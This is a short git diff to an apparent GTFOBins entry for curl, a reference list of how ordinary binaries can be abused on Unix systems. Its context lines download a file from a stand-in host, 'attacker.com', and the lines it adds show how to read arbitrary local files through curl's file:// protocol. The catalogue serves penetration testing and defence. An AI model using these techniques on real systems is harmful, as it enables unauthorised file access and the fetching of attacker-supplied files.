diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index 8539b89..4581367 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -12,4 +12,9 @@ functions: URL=http://attacker.com/file_to_get LFILE=file_to_save curl $URL -o $LFILE + file-read: + - description: Uses the FILE protocol to fetch and display the file. The file path must be absolute. + code: | + LFILE=/tmp/file_to_read + curl file://$LFILE ---